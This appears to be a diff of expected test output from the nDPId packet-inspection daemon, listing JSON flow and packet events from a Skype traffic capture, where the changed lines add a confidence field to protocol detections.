+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3zjoAAEARkxnAqAEiQAQXlDLdnEoAI3yfnAQC5t7RxPpucIQEcbOpo3n\/i37I7X5QLz7O"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3gRQAAEARembAqAEib91NlDLdnF0AI32wnAYCAtkwZfUpvy0PrMgHjjv7gkQ5J07OrfdX"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1GOEAAEAR4qLAqAEib91NjTLdnFQAIf21nAgChdWCG2VT3PvRM4JN\/HMVRe1geqFvmA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"}
 00531{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431969665006,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"ts_msec":1431969665006,"pkt":"PBXCt3IOxCwDBkn+CABGAAAgivAAAAEC9ufAqAFc4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"}
-00564{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00590{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1j8QAAEARCNrAqAEiQTffGDLdnGAAISuNnAoCfsB5JB\/rTYpH1Pyy3TEn61xOyU3n6Q=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Ev0AAEAR0ADAqAEinTc4rzLdnE0AK5vynAwCv2wYRcgby0Lpb\/j9BzqAbRO\/1tuxNgazREl3CBLvd3M="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0pwAAAEARuljAqAEiQAQXkjLdgQkAIJb3nA4CpT3k+\/yRRYMAziIEiKPZ4SNw4uYJ"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ZQAAAEARfiTAqAEinTc4kTLdnFsAImkAnBACXCxecPPKFtdeUw7sQSBvp3gi9mq4vcM="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+hGcAAEARenXAqAEib91KKzLdnEEAKumHnBICbsOSISjTImKbV\/UiCWod5a6w5EFlZL740jo5mcYkgQ=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QwsAAEARVYDAqAEiQTffLDLdnE0AIF\/DnBQCMyjz3r9eJ18XTFVNiAvxrYpQ3ucg"}
